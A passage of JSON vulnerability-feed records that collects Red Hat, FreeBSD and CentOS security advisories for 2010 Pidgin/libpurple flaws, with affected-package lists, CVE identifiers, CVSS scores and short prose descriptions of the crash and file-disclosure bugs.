"pidgin-2.6.6-5.el4_8.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.6-5.el4_8", "packageName": "pidgin-devel", "packageFilename": "pidgin-devel-2.6.6-5.el4_8.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.6-5.el4_8", "packageName": "pidgin-perl", "packageFilename": "pidgin-perl-2.6.6-5.el4_8.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.6-5.el4_8", "packageName": "finch", "packageFilename": "finch-2.6.6-5.el4_8.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.6-5.el4_8", "packageName": "finch-devel", "packageFilename": "finch-devel-2.6.6-5.el4_8.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.6-5.el4_8", "packageName": "libpurple", "packageFilename": "libpurple-2.6.6-5.el4_8.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.6-5.el4_8", "packageName": "libpurple-devel", "packageFilename": "libpurple-devel-2.6.6-5.el4_8.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.6-5.el4_8", "packageName": "libpurple-perl", "packageFilename": "libpurple-perl-2.6.6-5.el4_8.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.6-5.el4_8", "packageName": "libpurple-tcl", "packageFilename": "libpurple-tcl-2.6.6-5.el4_8.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.6-5.el4_8", "packageName": "pidgin", "packageFilename": "pidgin-2.6.6-5.el4_8.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.6-5.el4_8", "packageName": "pidgin-devel", "packageFilename": "pidgin-devel-2.6.6-5.el4_8.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.6-5.el4_8", "packageName": "pidgin-perl", "packageFilename": "pidgin-perl-2.6.6-5.el4_8.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.6-5.el5_5", "packageName": "finch", "packageFilename": "finch-2.6.6-5.el5_5.i386.rpm", "arch": "i386", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.6-5.el5_5", "packageName": "libpurple", "packageFilename": "libpurple-2.6.6-5.el5_5.i386.rpm", "arch": "i386", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.6-5.el5_5", "packageName": "libpurple-perl", "packageFilename": "libpurple-perl-2.6.6-5.el5_5.i386.rpm", "arch": "i386", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.6-5.el5_5", "packageName": "libpurple-tcl", "packageFilename": "libpurple-tcl-2.6.6-5.el5_5.i386.rpm", "arch": "i386", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.6-5.el5_5", "packageName": "pidgin", "packageFilename": "pidgin-2.6.6-5.el5_5.i386.rpm", "arch": "i386", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.6-5.el5_5", "packageName": "pidgin-perl", "packageFilename": "pidgin-perl-2.6.6-5.el5_5.i386.rpm", "arch": "i386", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.6-5.el5_5", "packageName": "pidgin", "packageFilename": "pidgin-2.6.6-5.el5_5.src.rpm", "arch": "src", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.6-5.el5_5", "packageName": "finch", "packageFilename": "finch-2.6.6-5.el5_5.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.6-5.el5_5", "packageName": "libpurple", "packageFilename": "libpurple-2.6.6-5.el5_5.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.6-5.el5_5", "packageName": "libpurple-perl", "packageFilename": "libpurple-perl-2.6.6-5.el5_5.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.6-5.el5_5", "packageName": "libpurple-tcl", "packageFilename": "libpurple-tcl-2.6.6-5.el5_5.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.6-5.el5_5", "packageName": "pidgin", "packageFilename": "pidgin-2.6.6-5.el5_5.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.6-5.el5_5", "packageName": "pidgin-perl", "packageFilename": "pidgin-perl-2.6.6-5.el5_5.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.6-5.el5_5", "packageName": "finch-devel", "packageFilename": "finch-devel-2.6.6-5.el5_5.i386.rpm", "arch": "i386", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.6-5.el5_5", "packageName": "libpurple-devel", "packageFilename": "libpurple-devel-2.6.6-5.el5_5.i386.rpm", "arch": "i386", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.6-5.el5_5", "packageName": "pidgin-devel", "packageFilename": "pidgin-devel-2.6.6-5.el5_5.i386.rpm", "arch": "i386", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.6-5.el5_5", "packageName": "finch-devel", "packageFilename": "finch-devel-2.6.6-5.el5_5.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.6-5.el5_5", "packageName": "libpurple-devel", "packageFilename": "libpurple-devel-2.6.6-5.el5_5.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.6-5.el5_5", "packageName": "pidgin-devel", "packageFilename": "pidgin-devel-2.6.6-5.el5_5.x86_64.rpm", "arch": "x86_64", "operator": "lt"}], "description": "Pidgin is an instant messaging program which can log in to multiple\naccounts on multiple instant messaging networks simultaneously.\n\nMultiple NULL pointer dereference flaws were found in the way Pidgin\nhandled Base64 decoding. A remote attacker could use these flaws to crash\nPidgin if the target Pidgin user was using the Yahoo! Messenger Protocol,\nMSN, MySpace, or Extensible Messaging and Presence Protocol (XMPP) protocol\nplug-ins, or using the Microsoft NT LAN Manager (NTLM) protocol for\nauthentication. (CVE-2010-3711)\n\nA NULL pointer dereference flaw was found in the way the Pidgin MSN\nprotocol plug-in processed custom emoticon messages. A remote attacker\ncould use this flaw to crash Pidgin by sending specially-crafted emoticon\nmessages during mutual communication. (CVE-2010-1624)\n\nRed Hat would like to thank the Pidgin project for reporting these issues.\nUpstream acknowledges Daniel Atallah as the original reporter of\nCVE-2010-3711, and Pierre Nogues of Meta Security as the original reporter\nof CVE-2010-1624.\n\nAll Pidgin users should upgrade to these updated packages, which contain\nbackported patches to resolve these issues. Pidgin must be restarted for\nthis update to take effect.\n", "reporter": "RedHat", "published": "2010-10-21T04:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "redhat", "title": "(RHSA-2010:0788) Moderate: pidgin security update", "bulletinFamily": "unix", "cvelist": ["CVE-2010-1624", "CVE-2010-3711"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2017-09-08T12:10:29", "id": "RHSA-2010:0788", "href": "https://access.redhat.com/errata/RHSA-2010:0788", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-09-09T07:19:54", "_object_types": ["robots.models.redhat.RedHatBulletin", "robots.models.base.Bulletin"], "enchantments_done": [], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "i386", "packageFilename": "pidgin-perl-2.6.5-1.el4.1.i386.rpm", "packageName": "pidgin-perl", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "i386", "packageFilename": "libpurple-devel-2.6.5-1.el4.1.i386.rpm", "packageName": "libpurple-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "i386", "packageFilename": "pidgin-devel-2.6.5-1.el4.1.i386.rpm", "packageName": "pidgin-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "i386", "packageFilename": "pidgin-2.6.5-1.el4.1.i386.rpm", "packageName": "pidgin", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "i386", "packageFilename": "libpurple-2.6.5-1.el4.1.i386.rpm", "packageName": "libpurple", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "i386", "packageFilename": "libpurple-perl-2.6.5-1.el4.1.i386.rpm", "packageName": "libpurple-perl", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "i386", "packageFilename": "libpurple-tcl-2.6.5-1.el4.1.i386.rpm", "packageName": "libpurple-tcl", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "i386", "packageFilename": "finch-devel-2.6.5-1.el4.1.i386.rpm", "packageName": "finch-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "i386", "packageFilename": "finch-2.6.5-1.el4.1.i386.rpm", "packageName": "finch", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "src", "packageFilename": "pidgin-2.6.5-1.el4.1.src.rpm", "packageName": "pidgin", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "ia64", "packageFilename": "pidgin-devel-2.6.5-1.el4.1.ia64.rpm", "packageName": "pidgin-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "ia64", "packageFilename": "pidgin-2.6.5-1.el4.1.ia64.rpm", "packageName": "pidgin", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "ia64", "packageFilename": "libpurple-2.6.5-1.el4.1.ia64.rpm", "packageName": "libpurple", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "ia64", "packageFilename": "libpurple-tcl-2.6.5-1.el4.1.ia64.rpm", "packageName": "libpurple-tcl", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "ia64", "packageFilename": "libpurple-devel-2.6.5-1.el4.1.ia64.rpm", "packageName": "libpurple-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "ia64", "packageFilename": "finch-2.6.5-1.el4.1.ia64.rpm", "packageName": "finch", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "ia64", "packageFilename": "pidgin-perl-2.6.5-1.el4.1.ia64.rpm", "packageName": "pidgin-perl", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "ia64", "packageFilename": "libpurple-perl-2.6.5-1.el4.1.ia64.rpm", "packageName": "libpurple-perl", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "ia64", "packageFilename": "finch-devel-2.6.5-1.el4.1.ia64.rpm", "packageName": "finch-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "x86_64", "packageFilename": "libpurple-perl-2.6.5-1.el4.1.x86_64.rpm", "packageName": "libpurple-perl", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "x86_64", "packageFilename": "finch-2.6.5-1.el4.1.x86_64.rpm", "packageName": "finch", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "x86_64", "packageFilename": "finch-devel-2.6.5-1.el4.1.x86_64.rpm", "packageName": "finch-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "x86_64", "packageFilename": "pidgin-2.6.5-1.el4.1.x86_64.rpm", "packageName": "pidgin", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "x86_64", "packageFilename": "libpurple-devel-2.6.5-1.el4.1.x86_64.rpm", "packageName": "libpurple-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "x86_64", "packageFilename": "libpurple-2.6.5-1.el4.1.x86_64.rpm", "packageName": "libpurple", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "x86_64", "packageFilename": "pidgin-perl-2.6.5-1.el4.1.x86_64.rpm", "packageName": "pidgin-perl", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "x86_64", "packageFilename": "pidgin-devel-2.6.5-1.el4.1.x86_64.rpm", "packageName": "pidgin-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "x86_64", "packageFilename": "libpurple-tcl-2.6.5-1.el4.1.x86_64.rpm", "packageName": "libpurple-tcl", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "ppc", "packageFilename": "finch-2.6.5-1.el4.1.ppc.rpm", "packageName": "finch", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "ppc", "packageFilename": "libpurple-perl-2.6.5-1.el4.1.ppc.rpm", "packageName": "libpurple-perl", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "ppc", "packageFilename": "pidgin-devel-2.6.5-1.el4.1.ppc.rpm", "packageName": "pidgin-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "ppc", "packageFilename": "finch-devel-2.6.5-1.el4.1.ppc.rpm", "packageName": "finch-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "ppc", "packageFilename": "pidgin-2.6.5-1.el4.1.ppc.rpm", "packageName": "pidgin", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "ppc", "packageFilename": "libpurple-2.6.5-1.el4.1.ppc.rpm", "packageName": "libpurple", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "ppc", "packageFilename": "libpurple-tcl-2.6.5-1.el4.1.ppc.rpm", "packageName": "libpurple-tcl", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "ppc", "packageFilename": "pidgin-perl-2.6.5-1.el4.1.ppc.rpm", "packageName": "pidgin-perl", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "ppc", "packageFilename": "libpurple-devel-2.6.5-1.el4.1.ppc.rpm", "packageName": "libpurple-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.5-1.el5", "arch": "i386", "packageFilename": "pidgin-2.6.5-1.el5.i386.rpm", "packageName": "pidgin", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.5-1.el5", "arch": "i386", "packageFilename": "pidgin-perl-2.6.5-1.el5.i386.rpm", "packageName": "pidgin-perl", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.5-1.el5", "arch": "i386", "packageFilename": "finch-2.6.5-1.el5.i386.rpm", "packageName": "finch", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.5-1.el5", "arch": "i386", "packageFilename": "libpurple-2.6.5-1.el5.i386.rpm", "packageName": "libpurple", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.5-1.el5", "arch": "i386", "packageFilename": "libpurple-perl-2.6.5-1.el5.i386.rpm", "packageName": "libpurple-perl", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.5-1.el5", "arch": "i386", "packageFilename": "libpurple-tcl-2.6.5-1.el5.i386.rpm", "packageName": "libpurple-tcl", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.5-1.el5", "arch": "src", "packageFilename": "pidgin-2.6.5-1.el5.src.rpm", "packageName": "pidgin", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.5-1.el5", "arch": "x86_64", "packageFilename": "finch-2.6.5-1.el5.x86_64.rpm", "packageName": "finch", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.5-1.el5", "arch": "x86_64", "packageFilename": "libpurple-perl-2.6.5-1.el5.x86_64.rpm", "packageName": "libpurple-perl", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.5-1.el5", "arch": "x86_64", "packageFilename": "libpurple-2.6.5-1.el5.x86_64.rpm", "packageName": "libpurple", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.5-1.el5", "arch": "x86_64", "packageFilename": "pidgin-perl-2.6.5-1.el5.x86_64.rpm", "packageName": "pidgin-perl", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.5-1.el5", "arch": "x86_64", "packageFilename": "libpurple-tcl-2.6.5-1.el5.x86_64.rpm", "packageName": "libpurple-tcl", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.5-1.el5", "arch": "x86_64", "packageFilename": "pidgin-2.6.5-1.el5.x86_64.rpm", "packageName": "pidgin", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.5-1.el5", "arch": "i386", "packageFilename": "finch-devel-2.6.5-1.el5.i386.rpm", "packageName": "finch-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.5-1.el5", "arch": "i386", "packageFilename": "libpurple-devel-2.6.5-1.el5.i386.rpm", "packageName": "libpurple-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.5-1.el5", "arch": "i386", "packageFilename": "pidgin-devel-2.6.5-1.el5.i386.rpm", "packageName": "pidgin-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.5-1.el5", "arch": "x86_64", "packageFilename": "finch-devel-2.6.5-1.el5.x86_64.rpm", "packageName": "finch-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.5-1.el5", "arch": "x86_64", "packageFilename": "pidgin-devel-2.6.5-1.el5.x86_64.rpm", "packageName": "pidgin-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.5-1.el5", "arch": "x86_64", "packageFilename": "libpurple-devel-2.6.5-1.el5.x86_64.rpm", "packageName": "libpurple-devel", "operator": "lt"}], "description": "Pidgin is an instant messaging program which can log in to multiple\naccounts on multiple instant messaging networks simultaneously.\n\nA directory traversal flaw was discovered in Pidgin's MSN protocol\nimplementation. A remote attacker could send a specially-crafted emoticon\nimage download request that would cause Pidgin to disclose an arbitrary\nfile readable to the user running Pidgin. (CVE-2010-0013)\n\nThese packages upgrade Pidgin to version 2.6.5. Refer to the Pidgin release\nnotes for a full list of changes: http://developer.pidgin.im/wiki/ChangeLog\n\nAll Pidgin users should upgrade to these updated packages, which correct\nthis issue. Pidgin must be restarted for this update to take effect.", "reporter": "RedHat", "published": "2010-01-14T05:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "redhat", "title": "(RHSA-2010:0044) Important: pidgin security update", "bulletinFamily": "unix", "cvelist": ["CVE-2010-0013"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2017-09-08T12:20:32", "id": "RHSA-2010:0044", "href": "https://access.redhat.com/errata/RHSA-2010:0044", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "freebsd": [{"lastseen": "2016-09-26T17:24:49", "references": ["http://pidgin.im/news/security/?id=44", "http://pidgin.im/news/security/?id=43", "http://pidgin.im/news/security/?id=45"], "affectedPackage": [{"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "2.6.6", "packageFilename": "UNKNOWN", "packageName": "libpurple", "arch": "noarch", "operator": "lt"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "2.6.6", "packageFilename": "UNKNOWN", "packageName": "pidgin", "arch": "noarch", "operator": "lt"}], "edition": 1, "description": "\nThree denial of service vulnerabilities where found in\n\t pidgin and allow remote attackers to crash the application.\n\t The developers summarized these problems as follows:\n\nPidgin can become unresponsive when displaying large\n\t numbers of smileys\n\n\nCertain nicknames in group chat rooms can trigger a\n\t crash in Finch\n\n\nFailure to validate all fields of an incoming message\n\t can trigger a crash\n\n", "reporter": "FreeBSD", "published": "2010-02-18T00:00:00", "title": "pidgin -- multiple remote denial of service vulnerabilities", "type": "freebsd", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2010-0420", "CVE-2010-0423", "CVE-2010-0277"], "modified": "2010-02-18T00:00:00", "href": "https://vuxml.freebsd.org/freebsd/a2c4d3d5-4c7b-11df-83fb-0015587e2cc1.html", "id": "A2C4D3D5-4C7B-11DF-83FB-0015587E2CC1", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "centos": [{"lastseen": "2017-10-03T18:24:33", "references": ["http://rhn.redhat.com/errata/RHSA-2010-0115.html", "http://pgp.mit.edu:11371/pks/lookup?op=get&search=0xBEFA581B", "https://rhn.redhat.com/errata/RHSA-2010-0115.html"], "affectedPackage": [{"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.6-1.el5", "packageFilename": "libpurple-devel-2.6.6-1.el5.i386.rpm", "packageName": "libpurple-devel", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.6-1.el5", "packageFilename": "libpurple-devel-2.6.6-1.el5.i386.rpm", "packageName": "libpurple-devel", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.6-1.el5", "packageFilename": "libpurple-tcl-2.6.6-1.el5.x86_64.rpm", "packageName": "libpurple-tcl", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "packageFilename": "libpurple-tcl-2.6.6-1.el4.i386.rpm", "packageName": "libpurple-tcl", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.6-1.el5", "packageFilename": "pidgin-2.6.6-1.el5.x86_64.rpm", "packageName": "pidgin", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "packageFilename": "pidgin-devel-2.6.6-1.el4.x86_64.rpm", "packageName": "pidgin-devel", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.6-1.el5", "packageFilename": "pidgin-perl-2.6.6-1.el5.x86_64.rpm", "packageName": "pidgin-perl", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.6-1.el5", "packageFilename": "finch-2.6.6-1.el5.i386.rpm", "packageName": "finch", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.6-1.el5", "packageFilename": "finch-2.6.6-1.el5.i386.rpm", "packageName": "finch", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "packageFilename": "libpurple-2.6.6-1.el4.x86_64.rpm", "packageName": "libpurple", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.6-1.el5", "packageFilename": "libpurple-2.6.6-1.el5.x86_64.rpm", "packageName": "libpurple", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.6-1.el5", "packageFilename": "finch-2.6.6-1.el5.x86_64.rpm", "packageName": "finch", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "packageFilename": "finch-devel-2.6.6-1.el4.x86_64.rpm", "packageName": "finch-devel", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "packageFilename": "libpurple-tcl-2.6.6-1.el4.x86_64.rpm", "packageName": "libpurple-tcl", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.6-1.el5", "packageFilename": "libpurple-2.6.6-1.el5.i386.rpm", "packageName": "libpurple", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.6-1.el5", "packageFilename": "libpurple-2.6.6-1.el5.i386.rpm", "packageName": "libpurple", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "packageFilename": "libpurple-devel-2.6.6-1.el4.x86_64.rpm", "packageName": "libpurple-devel", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "packageFilename": "finch-devel-2.6.6-1.el4.i386.rpm", "packageName": "finch-devel", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "packageFilename": "pidgin-perl-2.6.6-1.el4.i386.rpm", "packageName": "pidgin-perl", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "packageFilename": "libpurple-2.6.6-1.el4.i386.rpm", "packageName": "libpurple", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "packageFilename": "finch-2.6.6-1.el4.i386.rpm", "packageName": "finch", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.6-1.el5", "packageFilename": "pidgin-perl-2.6.6-1.el5.i386.rpm", "packageName": "pidgin-perl", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "packageFilename": "libpurple-perl-2.6.6-1.el4.i386.rpm", "packageName": "libpurple-perl", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.6-1.el5", "packageFilename": "pidgin-devel-2.6.6-1.el5.i386.rpm", "packageName": "pidgin-devel", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.6-1.el5", "packageFilename": "pidgin-devel-2.6.6-1.el5.i386.rpm", "packageName": "pidgin-devel", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "packageFilename": "pidgin-devel-2.6.6-1.el4.i386.rpm", "packageName": "pidgin-devel", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "packageFilename": "pidgin-2.6.6-1.el4.src.rpm", "packageName": "pidgin", "arch": "any", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "packageFilename": "pidgin-2.6.6-1.el4.src.rpm", "packageName": "pidgin", "arch": "any", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.6-1.el5", "packageFilename": "libpurple-perl-2.6.6-1.el5.x86_64.rpm", "packageName": "libpurple-perl", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.6-1.el5", "packageFilename": "libpurple-tcl-2.6.6-1.el5.i386.rpm", "packageName": "libpurple-tcl", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.6-1.el5", "packageFilename": "finch-devel-2.6.6-1.el5.x86_64.rpm", "packageName": "finch-devel", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "packageFilename": 